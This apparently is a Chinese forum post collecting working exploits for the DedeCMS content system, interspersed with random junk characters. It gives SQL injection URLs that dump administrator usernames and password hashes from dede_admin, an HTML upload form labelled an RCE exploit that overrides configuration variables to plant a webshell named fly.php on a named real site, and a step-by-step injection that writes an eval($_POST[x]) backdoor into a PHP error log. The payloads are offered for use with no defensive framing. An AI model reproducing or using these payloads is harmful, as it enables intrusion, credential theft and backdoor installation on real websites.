- r! q# \' R$ l3 g% f, vhttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='$ Y& i' B9 |+ `; H. ]3 ~

4 n- H! L8 ?8 P' \, S8 y, P, r) H' O7 y! s! N

+ J' p6 k1 M* t! V
% Z' S2 k" Y; C) O7 f0 {4 u/ \
2 B& A3 E8 B5 p
: [3 q- r+ h0 ]* k
, E+ y: f+ `0 Y9 G0 G: i  d2 P$ Y/ M( n1 b" R& k; J5 ]
9 O/ A; C* J8 c6 M
" W0 @/ X8 L# L
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
7 H& T% N( Z8 Z4 l( R& d' n<html>
9 u7 v0 z2 C' W) E- z<head>
) ^  c( z+ R8 r' J9 T8 A<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>% }$ M' U1 M1 K8 K+ i! |
</head>
$ |: @0 Y# v5 h( s& \<body style="FONT-SIZE: 9pt">" |0 n, B/ s% p6 ~: `/ Y
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />: I. Z8 c  H& y- j
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
2 [! v6 K$ c# m<input type='hidden' name='activepath' value='/data/cache/' />7 W/ D( ?0 B9 {( w0 k/ B4 ^
<input type='hidden' name='cfg_basedir' value='../../' />; G- R% J1 ^4 X4 @( h# l0 Z
<input type='hidden' name='cfg_imgtype' value='php' />! Q1 p, F7 L; o* q6 W
<input type='hidden' name='cfg_not_allowall' value='txt' /># n- ?+ J7 o* s3 U: s$ f' h$ C: A3 w2 }
<input type='hidden' name='cfg_softtype' value='php' />
/ ]3 k2 L7 e6 v) s+ T: v3 r" h<input type='hidden' name='cfg_mediatype' value='php' />
3 l: ^3 D* l. q( ?! A0 l<input type='hidden' name='f' value='form1.enclosure' />
, R$ `( [* y1 c1 v$ W<input type='hidden' name='job' value='upload' />
5 D( A& H8 J( V, ^<input type='hidden' name='newname' value='fly.php' />- X# Z) z! T) p; ?. w8 G/ E. }! ^: g
Select U Shell <input type='file' name='uploadfile' size='25' />8 k  q; _  N& G. o) n/ w
<input type='submit' name='sb1' value='确定' />
4 ~# E3 @% U+ k7 ~* E</form>6 Y- z; u0 }7 X( U* T3 P
<br />It's just a exp for the bug of Dedecms V55...<br />
6 l0 h  w" d, S7 }Need register_globals = on...<br />
  k  L2 B9 ?. d, nFun the game,get a webshell at /data/cache/fly.php...<br />
% c0 \- \7 j8 a4 ~</body>
* m7 P% {' V$ h) A+ l</html>5 V+ ]. f$ R3 D" v( _; l$ e$ Z9 C+ h
" }% V% m8 Q) l6 \
- F/ v( [  G6 B7 A* s

3 x, V0 T+ [$ i
6 ?. c+ k, K4 P' m& Y) F% {3 m' G# C2 J5 r
5 ]4 ]/ w) W  s/ Z; I& q4 O# L" r2 i0 ?  ~4 _6 b/ J
' v/ G$ G9 W; Z

, _7 U' @$ o3 M9 m1 {& E6 {' j) H6 S3 }( D& X, ?0 `6 i& |

6 h5 X- G) d* K$ ^织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞$ }: S/ A" l5 i0 C$ ]( D1 m
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。8 D- Q. w5 z/ u0 g( H% M# w
1. 访问网址:
  b$ O. y, H! O# P" _1 d5 O8 ^. J% n
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>  d* }) G' x3 I9 g5 d% B" z
可看见错误信息
) d3 ~2 ]3 q- q3 l  N& p% ~7 _2 z5 ^% \" |
+ k7 x5 P# h/ j0 b/ A. C  P
2. 访问
http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
8 ~2 [" ]4 z) P) j- k- t0 @int(3) Error: Illegal double '1024e1024' value found during parsing5 m* z0 q+ n- W# p9 t! x& ]: P
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>! X. j# c! P& V( R4 \* f/ H+ E

* ?9 e5 \9 S/ d& \& f4 V' C* `$ e4 k
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是! n4 S1 D- d: v4 ]" y

0 I5 z+ t4 W* f) }3 f* e
; }  |. F, H) f* D! i7 N<form action=”
http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
) {7 l& }3 ^" u" V
- q6 R- P* f3 Y+ P- a2 \# p, f, v9 E& }6 _# w& ?: H% P
按确定后的看到第2步骤的信息表示文件木马上传成功.' b/ H0 t# X! f- [. m: I% O2 N2 R

: ^" r6 T- P2 d9 o1 Z- K9 K9 S! K! t: h9 i# U# p2 [
+ N# O+ i  i$ I8 r) J- X

. {* P4 l5 F. D5 e5 Z+ D2 M( Z' {* U; d9 @' J) R/ Q
' ^  D5 O, \" I3 F! y

5 w1 |* n% N2 ^& E) I" L! {- i& i8 t% C% |7 T$ y

. n- h, J4 \$ F. K2 f& b3 _3 X5 S8 a& Y; b' H

7 Q4 I4 W, l3 M7 J% @+ R" ?% P, n) F) a- P; W( z/ d
织梦(DedeCms)plus/infosearch.php 文件注入漏洞
% _; v; Z1 x# J. a/ [http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表